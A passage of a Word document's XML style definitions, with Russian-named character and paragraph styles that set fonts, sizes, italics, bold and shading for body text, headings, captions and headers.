      <w:szCs w:val="16"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="190">
    <w:name w:val="Основной текст (19)_"/>
    <w:link w:val="191"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="192">
    <w:name w:val="Основной текст (19)"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1914">
    <w:name w:val="Основной текст (19)14"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="19BookmanOldStyle">
    <w:name w:val="Основной текст (19) + Bookman Old Style"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1913">
    <w:name w:val="Основной текст (19)13"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="19BookmanOldStyle2">
    <w:name w:val="Основной текст (19) + Bookman Old Style2"/>
    <w:aliases w:val="9 pt,Курсив"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="19BookmanOldStyle1">
    <w:name w:val="Основной текст (19) + Bookman Old Style1"/>
    <w:aliases w:val="9 pt1,Курсив1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="540">
    <w:name w:val="Основной текст (5)4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1912">
    <w:name w:val="Основной текст (19)12"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1911">
    <w:name w:val="Основной текст (19)11"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1910">
    <w:name w:val="Основной текст (19)10"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="199">
    <w:name w:val="Основной текст (19)9"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="198">
    <w:name w:val="Основной текст (19)8"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="197">
    <w:name w:val="Основной текст (19)7"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="196">
    <w:name w:val="Основной текст (19)6"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="195">
    <w:name w:val="Основной текст (19)5"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="194">
    <w:name w:val="Основной текст (19)4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1970">
    <w:name w:val="Основной текст (19) + 7"/>
    <w:aliases w:val="5 pt1,Полужирный"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="15"/>
      <w:szCs w:val="15"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="193">
    <w:name w:val="Основной текст (19)3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="530">
    <w:name w:val="Основной текст (5)3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="200">
    <w:name w:val="Основной текст (20)_"/>
    <w:link w:val="201"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="15"/>
      <w:szCs w:val="15"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="202">
    <w:name w:val="Основной текст (20)"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="209">
    <w:name w:val="Основной текст (20)9"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="208">
    <w:name w:val="Основной текст (20)8"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="65">
    <w:name w:val="Основной текст (6)5"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="551">
    <w:name w:val="Основной текст (5) + Курсив5"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="207">
    <w:name w:val="Основной текст (20)7"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="206">
    <w:name w:val="Основной текст (20)6"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="205">
    <w:name w:val="Основной текст (20)5"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="204">
    <w:name w:val="Основной текст (20)4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="522">
    <w:name w:val="Основной текст (5)2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="640">
    <w:name w:val="Основной текст (6)4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1920">
    <w:name w:val="Основной текст (19)2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="203">
    <w:name w:val="Основной текст (20)3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="2020">
    <w:name w:val="Основной текст (20)2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="630">
    <w:name w:val="Основной текст (6)3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="541">
    <w:name w:val="Основной текст (5) + Курсив4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:u w:val="single"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="531">
    <w:name w:val="Основной текст (5) + Курсив3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:i/>
      <w:iCs/>
      <w:noProof/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Exact">
    <w:name w:val="Подпись к картинке Exact"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:sz w:val="15"/>
      <w:szCs w:val="15"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="0ptExact">
    <w:name w:val="Подпись к картинке + Интервал 0 pt Exact"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:sz w:val="15"/>
      <w:szCs w:val="15"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="212">
    <w:name w:val="Основной текст (21)_"/>
    <w:link w:val="2110"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Microsoft Sans Serif" w:hAnsi="Microsoft Sans Serif" w:cs="Microsoft Sans Serif"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="213">
    <w:name w:val="Основной текст (21)"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Microsoft Sans Serif" w:hAnsi="Microsoft Sans Serif" w:cs="Microsoft Sans Serif"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="32Arial">
    <w:name w:val="Заголовок №3 (2) + Arial"/>
    <w:aliases w:val="13 pt3,Полужирный1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="223">
    <w:name w:val="Основной текст (22)_"/>
    <w:link w:val="2210"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Microsoft Sans Serif" w:hAnsi="Microsoft Sans Serif" w:cs="Microsoft Sans Serif"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="224">
    <w:name w:val="Основной текст (22)"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="5a">
    <w:name w:val="Основной текст (5) + Полужирный"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="512">
    <w:name w:val="Основной текст (5) + Полужирный1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:u w:val="single"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TimesNewRoman2">
    <w:name w:val="Колонтитул + Times New Roman2"/>
    <w:aliases w:val="13 pt2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="532">
    <w:name w:val="Заголовок №5 (3)_"/>
    <w:link w:val="5310"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Microsoft Sans Serif" w:hAnsi="Microsoft Sans Serif" w:cs="Microsoft Sans Serif"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="533">
    <w:name w:val="Заголовок №5 (3)"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="340">
    <w:name w:val="Основной текст (34)_"/>
    <w:link w:val="341"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="342">
    <w:name w:val="Основной текст (34) + Не полужирный"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff4">
    <w:name w:val="Подпись к картинке"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TimesNewRoman1">
    <w:name w:val="Колонтитул + Times New Roman1"/>
    <w:aliases w:val="13 pt1,Интервал 1 pt"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:spacing w:val="20"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="350">
    <w:name w:val="Основной текст (35)_"/>
    <w:link w:val="351"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:noProof/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="35BookmanOldStyle">
    <w:name w:val="Основной текст (35) + Bookman Old Style"/>
    <w:aliases w:val="8 pt"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:noProof/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="523">
    <w:name w:val="Основной текст (5) + Курсив2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="621">
    <w:name w:val="Основной текст (6)2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="611">
    <w:name w:val="Основной текст (6) + Не курсив1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="513">
    <w:name w:val="Основной текст (5) + Курсив1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:u w:val="single"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="524">
    <w:name w:val="Заголовок №5 (2)"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:u w:val="single"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="121">
    <w:name w:val="Заголовок №1 (2)1"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="120"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:after="600" w:line="240" w:lineRule="atLeast"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1d">
    <w:name w:val="Колонтитул1"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="aff2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:after="60" w:line="240" w:lineRule="atLeast"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="13"/>
      <w:szCs w:val="13"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="221">
    <w:name w:val="Заголовок №2 (2)1"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="220"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="600" w:after="120" w:line="408" w:lineRule="exact"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Microsoft Sans Serif" w:hAnsi="Microsoft Sans Serif" w:cs="Microsoft Sans Serif"/>
      <w:sz w:val="34"/>
      <w:szCs w:val="34"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="510">
    <w:name w:val="Основной текст (5)1"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="52"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="120" w:after="120" w:line="230" w:lineRule="exact"/>
      <w:ind w:hanging="440"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="521">
    <w:name w:val="Заголовок №5 (2)1"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="520"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="atLeast"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="321">
    <w:name w:val="Заголовок №3 (2)1"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="320"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="600" w:after="600" w:line="240" w:lineRule="atLeast"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Microsoft Sans Serif" w:hAnsi="Microsoft Sans Serif" w:cs="Microsoft Sans Serif"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="610">
    <w:name w:val="Основной текст (6)1"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="62"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="420" w:line="226" w:lineRule="exact"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="710">
    <w:name w:val="Основной текст (7)1"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="72"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="180" w:line="197" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="810">
    <w:name w:val="Основной текст (8)1"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="83"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="240" w:line="182" w:lineRule="exact"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="511">
    <w:name w:val="Подпись к картинке (5)1"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="54"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:line="206" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="15"/>
      <w:szCs w:val="15"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1210">
    <w:name w:val="Основной текст (12)1"/>
    <w:basedOn w:val="a"/>
